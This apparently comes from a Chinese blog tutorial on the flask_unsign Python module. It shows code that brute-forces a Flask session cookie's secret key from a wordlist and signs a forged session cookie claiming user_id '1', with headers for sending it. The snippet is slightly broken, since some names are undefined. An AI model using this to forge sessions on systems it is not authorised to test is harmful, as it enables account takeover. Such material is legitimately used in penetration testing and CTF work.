python 中的 flask_unsign 模块如何使用?

已于 2023-11-09 09:07:57 修改
阅读量918 收藏 3
点赞数
文章标签: python 后端 web安全
于 2023-02-13 15:54:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Java_Dad/article/details/129010630
版权

作者:破符

模块的作用

有些web交互中的cookie是加密的,flask_unsign 模块的作用是字典爆破加密cookie的密钥。

模块下载

python -m pip install flask_unsign

python -m pip install flask_unsign_wordlist

模块使用

爆破cookie生成私钥
from flask_unsign import Cracker
from flask_unsign import logger,DEFAULT_WORDLIST

crack = Cracker(value=cookie,salt=DEFAULT_SALT,threads=8)
with wordlist (DEFAULT_WORDLIST) as iterator:
                    crack.crack(iterator)
        if crack.secret:
            logger.success(f'Found secret key after {crack.attempts} attempts')
            session1 = ascii(crack.secret)		#如果session1有结果,则该值为爆破出来的私钥
利用爆破出来的私钥生成新的cookie
from flask_unsign import session

sec_session = session.sign(value="{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}",secret= session1,)		#secret若无特殊要求,值应为爆破cookie生成的session1

#sec_session值为cookie可添加入header头部

顺便提供一下交互用的头部,注意sec_session为新生成的cookie

{
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36',
            "Cookie" : "session="+sec_session
}
毛伯星
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
flask、session、cookie解加密脚本
10-13
flask、session、cookie解加密脚本
Python库 | flask_unsign_wordlist-0.0.5-py2.py3-none-any.whl
03-19
python库,解压后可用。 资源全名:flask_unsign_wordlist-0.0.5-py2.py3-none-any.whl
Flask用户密码的加密和解密
qq_44906497的博客
09-18 392
在models.py,写入如下代码。
python Flask 02 Flask 内置的 Session
一越王超的博客
04-03 469
Flask的Session非常的奇怪,他会将你的SessionID存放在客户端的Cookie,使用起来也非常的奇怪。 1. Flask session 是需要 secret_key 的 from flask import session app = Flask(__name__) app.secret_key = "DragonFire" secret_key 实际上是用来加密字符...
flask的安装与入门使用
changfcqxhy的博客
07-02 554
一、flask的安装 flask项目一般使用虚拟环境virtualenv运行,当然也可以直接在全局环境使用 virtualenv的安装使用可以参考https://blog.csdn.net/changfcqxhy/article/details/90611331 安装 进入虚拟环境,输入指令 pip install Flask 等待安装完成即可 二、flask入门 参考文档 http://do...
douban_flask_pythonflask豆瓣_python_
10-02
PYTHON 获得豆瓣电影榜单TOP250 爬虫升级版本
基于Pythonflask_app火电代码解析设计源码
04-12
flask_app项目基于Python开发,包含115个文件,包括Python源代码、CSV文件、GIT忽略文件、LICENSE文件和Markdown文档。系统用于解析flask_app火电代码,界面友好,功能完善。
Basic_Python_Flask_todo_class:Basic_Python_Flask_TODO_API_Practical
02-18
这是一个交互式教程,将教您如何使用Python和Pipenv使用Python Flask框架创建API。 请单击此处开始教程: 关于我们将要建设的项目 在本教程,我们将构建一个REST API,该API将3个端点公开给互联网: GET /todos ...
python(环境安装)搭建、pycharm安装、背景改为白色详细文章
2301_77161927的博客
05-13 438
python(环境搭建)安装、pycharm安装、背景颜色改为白色。
力扣 516. 最长回文子序列 python AC
qq_63443032的博客
05-12 596
二维dp
PythonPython变量或者函数加下划线‘_‘的含义
最新发布
yangweipeng708的博客
05-14 595
理解这些约定可以帮助Python开发者编写更清晰、更Pythonic的代码,并理解其他Python代码的命名习惯。)通常用来指示特定的编程约定或用法,这些约定主要关乎变量和函数的可访问性以及预期的使用范围。在Python,变量或函数前面加一个下划线(
python3.6.8安装Transformers
筱阳的博客
05-13 649
4.transformers安装。
Python实战开发及案例分析(16)—— 遗传算法
贾贾的博客
05-11 1094
遗传算法(Genetic Algorithm, GA)是一种模拟自然选择和遗传学原理的搜索启发式算法。它们通常用于解决优化和搜索问题,基于“适者生存”的自然选择概念,通过选择、交叉(杂交)、变异操作在一系列迭代逐步优化解决方案。
python函数
2301_80040613的博客
05-13 931
语法:def 函数名(参数列表):函数体#无参hello()#有参return a+b。
将指定文件夹下每张用LabelImg标注的图片标注部分抠出来保存到指定文件夹下。
weixin_44119674的博客
05-10 137
将指定文件夹下每张用LabelImg标注的图片标注部分抠出来保存到指定文件夹下。
面试题 01.05. 一次编辑
Learning from the mistakes
05-11 271
字符串有三种编辑操作:插入一个英文字符、删除一个英文字符或者替换一个英文字符。给定两个字符串,编写一个函数判定它们是否只需要一次(或者零次)编辑。
python头歌买入股票
youyouxiong的博客
05-09 457
Python模拟买入股票的过程可以通过多种方式实现,这取决于你想要实现的复杂程度以及是否需要与实际的股票交易所进行交互。
python flask websocket_Flask使用websocket
05-18
Flask 使用 WebSocket,可以使用 Flask-SocketIO 扩展。这个扩展提供了一个 WebSocket 服务器和一个 Socket.IO 客户端。 首先,你需要在你的虚拟环境安装 Flask-SocketIO: ``` pip install flask-socketio...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值